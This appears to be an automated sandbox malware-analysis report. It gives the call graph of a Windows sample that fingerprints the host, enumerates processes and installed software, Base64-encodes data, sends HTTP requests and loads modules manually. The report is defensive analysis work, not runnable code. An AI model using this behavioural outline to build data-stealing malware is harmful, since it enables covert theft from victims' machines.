15125->15126 15127 df1d04 15126->15127 15128 df7850 3 API calls 15127->15128 15129 df1d14 15128->15129 15130 dfa9b0 4 API calls 15129->15130 15131 df1d24 15130->15131 15132 dfa8a0 lstrcpy 15131->15132 15133 df1d2d 15132->15133 15134 dfa9b0 4 API calls 15133->15134 15135 df1d4c 15134->15135 15136 dfa8a0 lstrcpy 15135->15136 15137 df1d55 15136->15137 15138 dfa9b0 4 API calls 15137->15138 15139 df1d75 15138->15139 15140 dfa8a0 lstrcpy 15139->15140 15141 df1d7e 15140->15141 15142 df78e0 3 API calls 15141->15142 15143 df1d8e 15142->15143 15144 dfa9b0 4 API calls 15143->15144 15145 df1d9e 15144->15145 15146 dfa8a0 lstrcpy 15145->15146 15147 df1da7 15146->15147 15148 dfa9b0 4 API calls 15147->15148 15149 df1dc6 15148->15149 15150 dfa8a0 lstrcpy 15149->15150 15151 df1dcf 15150->15151 15152 dfa9b0 4 API calls 15151->15152 15153 df1df0 15152->15153 15154 dfa8a0 lstrcpy 15153->15154 15155 df1df9 15154->15155 15816 df7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15155->15816 15158 dfa9b0 4 API calls 15159 df1e19 15158->15159 15160 dfa8a0 lstrcpy 15159->15160 15161 df1e22 15160->15161 15162 dfa9b0 4 API calls 15161->15162 15163 df1e41 15162->15163 15164 dfa8a0 lstrcpy 15163->15164 15165 df1e4a 15164->15165 15166 dfa9b0 4 API calls 15165->15166 15167 df1e6b 15166->15167 15168 dfa8a0 lstrcpy 15167->15168 15169 df1e74 15168->15169 15818 df7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15169->15818 15172 dfa9b0 4 API calls 15173 df1e94 15172->15173 15174 dfa8a0 lstrcpy 15173->15174 15175 df1e9d 15174->15175 15176 dfa9b0 4 API calls 15175->15176 15177 df1ebc 15176->15177 15178 dfa8a0 lstrcpy 15177->15178 15179 df1ec5 15178->15179 15180 dfa9b0 4 API calls 15179->15180 15181 df1ee5 15180->15181 15182 dfa8a0 lstrcpy 15181->15182 15183 df1eee 15182->15183 15821 df7b00 GetUserDefaultLocaleName 15183->15821 15186 dfa9b0 4 API calls 15187 df1f0e 15186->15187 15188 dfa8a0 lstrcpy 15187->15188 15189 df1f17 15188->15189 15190 dfa9b0 4 API calls 15189->15190 15191 df1f36 15190->15191 15192 dfa8a0 lstrcpy 15191->15192 15193 df1f3f 15192->15193 15194 dfa9b0 4 API calls 15193->15194 15195 df1f60 15194->15195 15196 dfa8a0 lstrcpy 15195->15196 15197 df1f69 15196->15197 15825 df7b90 15197->15825 15199 df1f80 15200 dfa920 3 API calls 15199->15200 15201 df1f93 15200->15201 15202 dfa8a0 lstrcpy 15201->15202 15203 df1f9c 15202->15203 15204 dfa9b0 4 API calls 15203->15204 15205 df1fc6 15204->15205 15206 dfa8a0 lstrcpy 15205->15206 15207 df1fcf 15206->15207 15208 dfa9b0 4 API calls 15207->15208 15209 df1fef 15208->15209 15210 dfa8a0 lstrcpy 15209->15210 15211 df1ff8 15210->15211 15837 df7d80 GetSystemPowerStatus 15211->15837 15214 dfa9b0 4 API calls 15215 df2018 15214->15215 15216 dfa8a0 lstrcpy 15215->15216 15217 df2021 15216->15217 15218 dfa9b0 4 API calls 15217->15218 15219 df2040 15218->15219 15220 dfa8a0 lstrcpy 15219->15220 15221 df2049 15220->15221 15222 dfa9b0 4 API calls 15221->15222 15223 df206a 15222->15223 15224 dfa8a0 lstrcpy 15223->15224 15225 df2073 15224->15225 15226 df207e GetCurrentProcessId 15225->15226 15839 df9470 OpenProcess 15226->15839 15229 dfa920 3 API calls 15230 df20a4 15229->15230 15231 dfa8a0 lstrcpy 15230->15231 15232 df20ad 15231->15232 15233 dfa9b0 4 API calls 15232->15233 15234 df20d7 15233->15234 15235 dfa8a0 lstrcpy 15234->15235 15236 df20e0 15235->15236 15237 dfa9b0 4 API calls 15236->15237 15238 df2100 15237->15238 15239 dfa8a0 lstrcpy 15238->15239 15240 df2109 15239->15240 15844 df7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15240->15844 15243 dfa9b0 4 API calls 15244 df2129 15243->15244 15245 dfa8a0 lstrcpy 15244->15245 15246 df2132 15245->15246 15247 dfa9b0 4 API calls 15246->15247 15248 df2151 15247->15248 15249 dfa8a0 lstrcpy 15248->15249 15250 df215a 15249->15250 15251 dfa9b0 4 API calls 15250->15251 15252 df217b 15251->15252 15253 dfa8a0 lstrcpy 15252->15253 15254 df2184 15253->15254 15848 df7f60 15254->15848 15257 dfa9b0 4 API calls 15258 df21a4 15257->15258 15259 dfa8a0 lstrcpy 15258->15259 15260 df21ad 15259->15260 15261 dfa9b0 4 API calls 15260->15261 15262 df21cc 15261->15262 15263 dfa8a0 lstrcpy 15262->15263 15264 df21d5 15263->15264 15265 dfa9b0 4 API calls 15264->15265 15266 df21f6 15265->15266 15267 dfa8a0 lstrcpy 15266->15267 15268 df21ff 15267->15268 15861 df7ed0 GetSystemInfo wsprintfA 15268->15861 15271 dfa9b0 4 API calls 15272 df221f 15271->15272 15273 dfa8a0 lstrcpy 15272->15273 15274 df2228 15273->15274 15275 dfa9b0 4 API calls 15274->15275 15276 df2247 15275->15276 15277 dfa8a0 lstrcpy 15276->15277 15278 df2250 15277->15278 15279 dfa9b0 4 API calls 15278->15279 15280 df2270 15279->15280 15281 dfa8a0 lstrcpy 15280->15281 15282 df2279 15281->15282 15863 df8100 GetProcessHeap RtlAllocateHeap 15282->15863 15285 dfa9b0 4 API calls 15286 df2299 15285->15286 15287 dfa8a0 lstrcpy 15286->15287 15288 df22a2 15287->15288 15289 dfa9b0 4 API calls 15288->15289 15290 df22c1 15289->15290 15291 dfa8a0 lstrcpy 15290->15291 15292 df22ca 15291->15292 15293 dfa9b0 4 API calls 15292->15293 15294 df22eb 15293->15294 15295 dfa8a0 lstrcpy 15294->15295 15296 df22f4 15295->15296 15869 df87c0 15296->15869 15299 dfa920 3 API calls 15300 df231e 15299->15300 15301 dfa8a0 lstrcpy 15300->15301 15302 df2327 15301->15302 15303 dfa9b0 4 API calls 15302->15303 15304 df2351 15303->15304 15305 dfa8a0 lstrcpy 15304->15305 15306 df235a 15305->15306 15307 dfa9b0 4 API calls 15306->15307 15308 df237a 15307->15308 15309 dfa8a0 lstrcpy 15308->15309 15310 df2383 15309->15310 15311 dfa9b0 4 API calls 15310->15311 15312 df23a2 15311->15312 15313 dfa8a0 lstrcpy 15312->15313 15314 df23ab 15313->15314 15874 df81f0 15314->15874 15316 df23c2 15317 dfa920 3 API calls 15316->15317 15318 df23d5 15317->15318 15319 dfa8a0 lstrcpy 15318->15319 15320 df23de 15319->15320 15321 dfa9b0 4 API calls 15320->15321 15322 df240a 15321->15322 15323 dfa8a0 lstrcpy 15322->15323 15324 df2413 15323->15324 15325 dfa9b0 4 API calls 15324->15325 15326 df2432 15325->15326 15327 dfa8a0 lstrcpy 15326->15327 15328 df243b 15327->15328 15329 dfa9b0 4 API calls 15328->15329 15330 df245c 15329->15330 15331 dfa8a0 lstrcpy 15330->15331 15332 df2465 15331->15332 15333 dfa9b0 4 API calls 15332->15333 15334 df2484 15333->15334 15335 dfa8a0 lstrcpy 15334->15335 15336 df248d 15335->15336 15337 dfa9b0 4 API calls 15336->15337 15338 df24ae 15337->15338 15339 dfa8a0 lstrcpy 15338->15339 15340 df24b7 15339->15340 15882 df8320 15340->15882 15342 df24d3 15343 dfa920 3 API calls 15342->15343 15344 df24e6 15343->15344 15345 dfa8a0 lstrcpy 15344->15345 15346 df24ef 15345->15346 15347 dfa9b0 4 API calls 15346->15347 15348 df2519 15347->15348 15349 dfa8a0 lstrcpy 15348->15349 15350 df2522 15349->15350 15351 dfa9b0 4 API calls 15350->15351 15352 df2543 15351->15352 15353 dfa8a0 lstrcpy 15352->15353 15354 df254c 15353->15354 15355 df8320 17 API calls 15354->15355 15356 df2568 15355->15356 15357 dfa920 3 API calls 15356->15357 15358 df257b 15357->15358 15359 dfa8a0 lstrcpy 15358->15359 15360 df2584 15359->15360 15361 dfa9b0 4 API calls 15360->15361 15362 df25ae 15361->15362 15363 dfa8a0 lstrcpy 15362->15363 15364 df25b7 15363->15364 15365 dfa9b0 4 API calls 15364->15365 15366 df25d6 15365->15366 15367 dfa8a0 lstrcpy 15366->15367 15368 df25df 15367->15368 15369 dfa9b0 4 API calls 15368->15369 15370 df2600 15369->15370 15371 dfa8a0 lstrcpy 15370->15371 15372 df2609 15371->15372 15918 df8680 15372->15918 15374 df2620 15375 dfa920 3 API calls 15374->15375 15376 df2633 15375->15376 15377 dfa8a0 lstrcpy 15376->15377 15378 df263c 15377->15378 15379 df265a lstrlen 15378->15379 15380 df266a 15379->15380 15381 dfa740 lstrcpy 15380->15381 15382 df267c 15381->15382 15383 de1590 lstrcpy 15382->15383 15384 df268d 15383->15384 15928 df5190 15384->15928 15386 df2699 15386->13818 16116 dfaad0 15387->16116 15389 de5009 InternetOpenUrlA 15393 de5021 15389->15393 15390 de502a InternetReadFile 15390->15393 15391 de50a0 InternetCloseHandle InternetCloseHandle 15392 de50ec 15391->15392 15392->13822 15393->15390 15393->15391 16117 de98d0 15394->16117 15396 df0759 15397 df077d 15396->15397 15398 df0a38 15396->15398 15401 df0799 StrCmpCA 15397->15401 15399 de1590 lstrcpy 15398->15399 15400 df0a49 15399->15400 16293 df0250 15400->16293 15403 df0843 15401->15403 15404 df07a8 15401->15404 15407 df0865 StrCmpCA 15403->15407 15406 dfa7a0 lstrcpy 15404->15406 15408 df07c3 15406->15408 15409 df0874 15407->15409 15446 df096b 15407->15446 15410 de1590 lstrcpy 15408->15410 15411 dfa740 lstrcpy 15409->15411 15412 df080c 15410->15412 15414 df0881 15411->15414 15415 dfa7a0 lstrcpy 15412->15415 15413 df099c StrCmpCA 15416 df09ab 15413->15416 15417 df0a2d 15413->15417 15418 dfa9b0 4 API calls 15414->15418 15419 df0823 15415->15419 15420 de1590 lstrcpy 15416->15420 15417->13826 15421 df08ac 15418->15421 15422 dfa7a0 lstrcpy 15419->15422 15423 df09f4 15420->15423 15424 dfa920 3 API calls 15421->15424 15425 df083e 15422->15425 15426 dfa7a0 lstrcpy 15423->15426 15427 df08b3 15424->15427 16120 defb00 15425->16120 15429 df0a0d 15426->15429 15430 dfa9b0 4 API calls 15427->15430 15431 dfa7a0 lstrcpy 15429->15431 15432 df08ba 15430->15432 15433 df0a28 15431->15433 15434 dfa8a0 lstrcpy 15432->15434 16236 df0030 15433->16236 15446->15413 15768 dfa7a0 lstrcpy 15767->15768 15769 de1683 15768->15769 15770 dfa7a0 lstrcpy 15769->15770 15771 de1695 15770->15771 15772 dfa7a0 lstrcpy 15771->15772 15773 de16a7 15772->15773 15774 dfa7a0 lstrcpy 15773->15774 15775 de15a3 15774->15775 15775->14649 15777 de47c6 15776->15777 15778 de4838 lstrlen 15777->15778 15802 dfaad0 15778->15802 15780 de4848 InternetCrackUrlA 15781 de4867 15780->15781 15781->14726 15783 dfa740 lstrcpy 15782->15783 15784 df8b74 15783->15784 15785 dfa740 lstrcpy 15784->15785 15786 df8b82 GetSystemTime 15785->15786 15788 df8b99 15786->15788 15787 dfa7a0 lstrcpy 15789 df8bfc 15787->15789 15788->15787 15789->14741 15791 dfa931 15790->15791 15792 dfa988 15791->15792 15794 dfa968 lstrcpy lstrcat 15791->15794 15793 dfa7a0 lstrcpy 15792->15793 15795 dfa994 15793->15795 15794->15792 15795->14744 15796->14859 15798 de4eee 15797->15798 15799 de9af9 LocalAlloc 15797->15799 15798->14747 15798->14749 15799->15798 15800 de9b14 CryptStringToBinaryA 15799->15800 15800->15798 15801 de9b39 LocalFree 15800->15801 15801->15798 15802->15780 15803->14869 15804->15010 15805->15012 15806->15020 15935 df77a0 15807->15935 15810 df1c1e 15810->15102 15811 df76c6 RegOpenKeyExA 15812 df76e7 RegQueryValueExA 15811->15812 15813 df7704 RegCloseKey 15811->15813 15812->15813 15813->15810 15815 df1c99 15814->15815 15815->15116 15817 df1e09 15816->15817 15817->15158 15819 df7a9a wsprintfA 15818->15819 15820 df1e84 15818->15820 15819->15820 15820->15172 15822 df7b4d 15821->15822 15823 df1efe 15821->15823 15942 df8d20 LocalAlloc CharToOemW 15822->15942 15823->15186 15826 dfa740 lstrcpy 15825->15826 15827 df7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15826->15827 15828 df7c25 15827->15828 15829 df7d18 15828->15829 15830 df7c46 GetLocaleInfoA 15828->15830 15834 dfa8a0 lstrcpy 15828->15834 15835 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15835 15831 df7d1e LocalFree 15829->15831 15832 df7d28 15829->15832 15830->15828 15831->15832 15833 dfa7a0 lstrcpy 15832->15833 15836 df7d37 15833->15836 15834->15828 15835->15828 15836->15199 15838 df2008 15837->15838 15838->15214 15840 df94b5 15839->15840 15841 df9493 GetModuleFileNameExA CloseHandle 15839->15841 15842 dfa740 lstrcpy 15840->15842 15841->15840 15843 df2091 15842->15843 15843->15229 15845 df7e68 RegQueryValueExA 15844->15845 15847 df2119 15844->15847 15846 df7e8e RegCloseKey 15845->15846 15846->15847 15847->15243 15849 df7fb9 GetLogicalProcessorInformationEx 15848->15849 15850 df7fd8 GetLastError 15849->15850 15852 df8029 15849->15852 15851 df8022 15850->15851 15860 df7fe3 15850->15860 15854 df2194 15851->15854 15856 df89f0 2 API calls 15851->15856 15857 df89f0 2 API calls 15852->15857 15854->15257 15856->15854 15858 df807b 15857->15858 15858->15851 15859 df8084 wsprintfA 15858->15859 15859->15854 15860->15849 15860->15854 15943 df89f0 15860->15943 15946 df8a10 GetProcessHeap RtlAllocateHeap 15860->15946 15862 df220f 15861->15862 15862->15271 15864 df89b0 15863->15864 15865 df814d GlobalMemoryStatusEx 15864->15865 15867 df8163 15865->15867 15866 df819b wsprintfA 15868 df2289 15866->15868 15867->15866 15868->15285 15870 df87fb GetProcessHeap RtlAllocateHeap wsprintfA 15869->15870 15872 dfa740 lstrcpy 15870->15872 15873 df230b 15872->15873 15873->15299 15875 dfa740 lstrcpy 15874->15875 15876 df8229 15875->15876 15877 df8263 15876->15877 15880 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15876->15880 15881 dfa8a0 lstrcpy 15876->15881 15878 dfa7a0 lstrcpy 15877->15878 15879 df82dc 15878->15879 15879->15316 15880->15876 15881->15876 15883 dfa740 lstrcpy 15882->15883 15884 df835c RegOpenKeyExA 15883->15884 15885 df83ae 15884->15885 15886 df83d0 15884->15886 15887 dfa7a0 lstrcpy 15885->15887 15888 df83f8 RegEnumKeyExA 15886->15888 15889 df8613 RegCloseKey 15886->15889 15900 df83bd 15887->15900 15891 df843f wsprintfA RegOpenKeyExA 15888->15891 15892 df860e 15888->15892 15890 dfa7a0 lstrcpy 15889->15890 15890->15900 15893 df8485 RegCloseKey RegCloseKey 15891->15893 15894 df84c1 RegQueryValueExA 15891->15894 15892->15889 15897 dfa7a0 lstrcpy 15893->15897 15895 df84fa lstrlen 15894->15895 15896 df8601 RegCloseKey 15894->15896 15895->15896 15898 df8510 15895->15898 15896->15892 15897->15900 15899 dfa9b0 4 API calls 15898->15899 15901 df8527 15899->15901 15900->15342 15902 dfa8a0 lstrcpy 15901->15902 15903 df8533 15902->15903 15904 dfa9b0 4 API calls 15903->15904 15905 df8557 15904->15905 15906 dfa8a0 lstrcpy 15905->15906 15907 df8563 15906->15907 15908 df856e RegQueryValueExA 15907->15908 15908->15896 15909 df85a3 15908->15909 15910 dfa9b0 4 API calls 15909->15910 15911 df85ba 15910->15911 15912 dfa8a0 lstrcpy 15911->15912 15913 df85c6 15912->15913 15914 dfa9b0 4 API calls 15913->15914 15915 df85ea 15914->15915 15916 dfa8a0 lstrcpy 15915->15916 15917 df85f6 15916->15917 15917->15896 15919 dfa740 lstrcpy 15918->15919 15920 df86bc CreateToolhelp32Snapshot Process32First 15919->15920 15921 df875d CloseHandle 15920->15921 15922 df86e8 Process32Next 15920->15922 15923 dfa7a0 lstrcpy 15921->15923 15922->15921 15927 df86fd 15922->15927 15925 df8776 15923->15925 15924 dfa8a0 lstrcpy 15924->15927 15925->15374 15926 dfa9b0 lstrcpy lstrlen lstrcpy lstrcat 15926->15927 15927->15922 15927->15924 15927->15926 15929 dfa7a0 lstrcpy 15928->15929 15930 df51b5 15929->15930 15931 de1590 lstrcpy 15930->15931 15932 df51c6 15931->15932 15947 de5100 15932->15947 15934 df51cf 15934->15386 15938 df7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15935->15938 15937 df76b9 15937->15810 15937->15811 15939 df7765 RegQueryValueExA 15938->15939 15940 df7780 RegCloseKey 15938->15940 15939->15940 15941 df7793 15940->15941 15941->15937 15942->15823 15944 df8a0c 15943->15944 15945 df89f9 GetProcessHeap HeapFree 15943->15945 15944->15860 15945->15944 15946->15860 15948 dfa7a0 lstrcpy 15947->15948 15949 de5119 15948->15949 15950 de47b0 2 API calls 15949->15950 15951 de5125 15950->15951 16107 df8ea0 15951->16107 15953 de5184 15954 de5192 lstrlen 15953->15954 15955 de51a5 15954->15955 15956 df8ea0 4 API calls 15955->15956 15957 de51b6 15956->15957 15958 dfa740 lstrcpy 15957->15958 15959 de51c9 15958->15959 15960 dfa740 lstrcpy 15959->15960 15961 de51d6 15960->15961 15962 dfa740 lstrcpy 15961->15962 15963 de51e3 15962->15963 15964 dfa740 lstrcpy 15963->15964 15965 de51f0 15964->15965 15966 dfa740 lstrcpy 15965->15966 15967 de51fd InternetOpenA StrCmpCA 15966->15967 15968 de522f 15967->15968 15969 de58c4 InternetCloseHandle 15968->15969 15970 df8b60 3 API calls 15968->15970 15976 de58d9 ctype 15969->15976 15971 de524e 15970->15971 15972 dfa920 3 API calls 15971->15972 15973 de5261 15972->15973 15974 dfa8a0 lstrcpy 15973->15974 15975 de526a 15974->15975 15977 dfa9b0 4 API calls 15975->15977 15980 dfa7a0 lstrcpy 15976->15980 15978 de52ab 15977->15978 15979 dfa920 3 API calls 15978->15979 15981 de52b2 15979->15981 15987 de5913 15980->15987 15982 dfa9b0 4 API calls 15981->15982 15983 de52b9 15982->15983 15984 dfa8a0 lstrcpy 15983->15984 15985 de52c2 15984->15985 15986 dfa9b0 4 API calls 15985->15986 15988 de5303 15986->15988 15987->15934 15989 dfa920 3 API calls 15988->15989 15990 de530a 15989->15990 15991 dfa8a0 lstrcpy 15990->15991 15992 de5313 15991->15992 15993 de5329 InternetConnectA 15992->15993 15993->15969 15994 de5359 HttpOpenRequestA 15993->15994 15996 de58b7 InternetCloseHandle 15994->15996 15997 de53b7 15994->15997 15996->15969 15998 dfa9b0 4 API calls 15997->15998 15999 de53cb 15998->15999 16000 dfa8a0 lstrcpy 15999->16000 16001 de53d4 16000->16001 16002 dfa920 3 API calls 16001->16002 16003 de53f2 16002->16003 16004 dfa8a0 lstrcpy 16003->16004 16005 de53fb 16004->16005 16006 dfa9b0 4 API calls 16005->16006 16007 de541a 16006->16007 16008 dfa8a0 lstrcpy 16007->16008 16009 de5423 16008->16009 16010 dfa9b0 4 API calls 16009->16010 16011 de5444 16010->16011 16012 dfa8a0 lstrcpy 16011->16012 16013 de544d 16012->16013 16014 dfa9b0 4 API calls 16013->16014 16015 de546e 16014->16015 16108 df8ead CryptBinaryToStringA 16107->16108 16109 df8ea9 16107->16109 16108->16109 16110 df8ece GetProcessHeap RtlAllocateHeap 16108->16110 16109->15953 16110->16109 16111 df8ef4 ctype 16110->16111 16112 df8f05 CryptBinaryToStringA 16111->16112 16112->16109 16116->15389 16359 de9880 16117->16359 16119 de98e1 16119->15396 16121 dfa740 lstrcpy 16120->16121 16294 dfa740 lstrcpy 16293->16294 16295 df0266 16294->16295 16296 df8de0 2 API calls 16295->16296 16297 df027b 16296->16297 16298 dfa920 3 API calls 16297->16298 16299 df028b 16298->16299 16300 dfa8a0 lstrcpy 16299->16300 16301 df0294 16300->16301 16302 dfa9b0 4 API calls 16301->16302 16360 de988d 16359->16360 16363 de6fb0 16360->16363 16362 de98ad ctype 16362->16119 16366 de6d40 16363->16366 16367 de6d63 16366->16367 16380 de6d59 16366->16380 16382 de6530 16367->16382 16371 de6dbe 16371->16380 16392 de69b0 16371->16392 16373 de6e2a 16374 de6ee6 VirtualFree 16373->16374 16376 de6ef7 16373->16376 16373->16380 16374->16376 16375 de6f41 16377 df89f0 2 API calls 16375->16377 16375->16380 16376->16375 16378 de6f38 16376->16378 16379 de6f26 FreeLibrary 16376->16379 16377->16380 16381 df89f0 2 API calls 16378->16381 16379->16376 16380->16362 16381->16375 16383 de6542 16382->16383 16385 de6549 16383->16385 16402 df8a10 GetProcessHeap RtlAllocateHeap 16383->16402 16385->16380 16386 de6660 16385->16386 16389 de668f VirtualAlloc 16386->16389 16388 de6730 16390 de673c 16388->16390 16391 de6743 VirtualAlloc 16388->16391 16389->16388 16389->16390 16390->16371 16391->16390 16393 de69c9 16392->16393 16397 de69d5 16392->16397 16394 de6a09 LoadLibraryA 16393->16394 16393->16397 16395 de6a32 16394->16395 16394->16397 16399 de6ae0 16395->16399 16403 df8a10 GetProcessHeap RtlAllocateHeap 16395->16403 16397->16373 16398 de6ba8 GetProcAddress 16398->16397 16398->16399 16399->16397 16399->16398 16400 df89f0 2 API calls 16400->16399 16401 de6a8b 16401->16397 16401->16400 16402->16385 16403->16401

                              Executed Functions

                              Function 00DF9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 df9860-df9874 call df9750 663 df987a-df9a8e call df9780 GetProcAddress * 21 660->663 664 df9a93-df9af2 LoadLibraryA * 5 660->664 663->664 665 df9b0d-df9b14 664->665 666 df9af4-df9b08 GetProcAddress 664->666 668 df9b46-df9b4d 665->668 669 df9b16-df9b41 GetProcAddress * 2 665->669 666->665 671 df9b4f-df9b63 GetProcAddress 668->671 672 df9b68-df9b6f 668->672 669->668 671->672 673 df9b89-df9b90 672->673 674 df9b71-df9b84 GetProcAddress 672->674 675 df9b92-df9bbc GetProcAddress * 2 673->675 676 df9bc1-df9bc2 673->676 674->673 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75900000,019706C0), ref: 00DF98A1
                              • GetProcAddress.KERNEL32(75900000,019704F8), ref: 00DF98BA
                              • GetProcAddress.KERNEL32(75900000,01970420), ref: 00DF98D2
                              • GetProcAddress.KERNEL32(75900000,019705D0), ref: 00DF98EA
                              • GetProcAddress.KERNEL32(75900000,019705E8), ref: 00DF9903
                              • GetProcAddress.KERNEL32(75900000,01978970), ref: 00DF991B
                              • GetProcAddress.KERNEL32(75900000,01965C48), ref: 00DF9933
                              • GetProcAddress.KERNEL32(75900000,01965C68), ref: 00DF994C
                              • GetProcAddress.KERNEL32(75900000,01970438), ref: 00DF9964
                              • GetProcAddress.KERNEL32(75900000,01970450), ref: 00DF997C
                              • GetProcAddress.KERNEL32(75900000,01970498), ref: 00DF9995
                              • GetProcAddress.KERNEL32(75900000,019704B0), ref: 00DF99AD
                              • GetProcAddress.KERNEL32(75900000,01965B28), ref: 00DF99C5
                              • GetProcAddress.KERNEL32(75900000,01970510), ref: 00DF99DE
                              • GetProcAddress.KERNEL32(75900000,01970540), ref: 00DF99F6
                              • GetProcAddress.KERNEL32(75900000,01965C28), ref: 00DF9A0E
                              • GetProcAddress.KERNEL32(75900000,01970558), ref: 00DF9A27
                              • GetProcAddress.KERNEL32(75900000,01970798), ref: 00DF9A3F
                              • GetProcAddress.KERNEL32(75900000,01965B48), ref: 00DF9A57
                              • GetProcAddress.KERNEL32(75900000,019706D8), ref: 00DF9A70
                              • GetProcAddress.KERNEL32(75900000,01965B88), ref: 00DF9A88
                              • LoadLibraryA.KERNEL32(01970780,?,00DF6A00), ref: 00DF9A9A
                              • LoadLibraryA.KERNEL32(019706F0,?,00DF6A00), ref: 00DF9AAB
                              • LoadLibraryA.KERNEL32(01970768,?,00DF6A00), ref: 00DF9ABD
                              • LoadLibraryA.KERNEL32(01970708,?,00DF6A00), ref: 00DF9ACF
                              • LoadLibraryA.KERNEL32(01970720,?,00DF6A00), ref: 00DF9AE0
                              • GetProcAddress.KERNEL32(75070000,01970738), ref: 00DF9B02
                              • GetProcAddress.KERNEL32(75FD0000,01970750), ref: 00DF9B23
                              • GetProcAddress.KERNEL32(75FD0000,01978C28), ref: 00DF9B3B
                              • GetProcAddress.KERNEL32(75A50000,01978C40), ref: 00DF9B5D
                              • GetProcAddress.KERNEL32(74E50000,01965BC8), ref: 00DF9B7E
                              • GetProcAddress.KERNEL32(76E80000,01978A00), ref: 00DF9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00DF9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00DF9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                              • Instruction ID: 3ed7824e0451f198b87b7d0046de5d6d4ebe9940454edba671256a0ecf7e137f
                              • Opcode Fuzzy Hash: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                              • Instruction Fuzzy Hash: F5A13BB5700240DFD374DFA8EA88A6637F9F78C205724856AE686C3A4CDE7F9441CB64
                              Function 00DE45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 de45c0-de4695 RtlAllocateHeap 781 de46a0-de46a6 764->781 782 de474f-de47a9 VirtualProtect 781->782 783 de46ac-de474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DE479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE477B
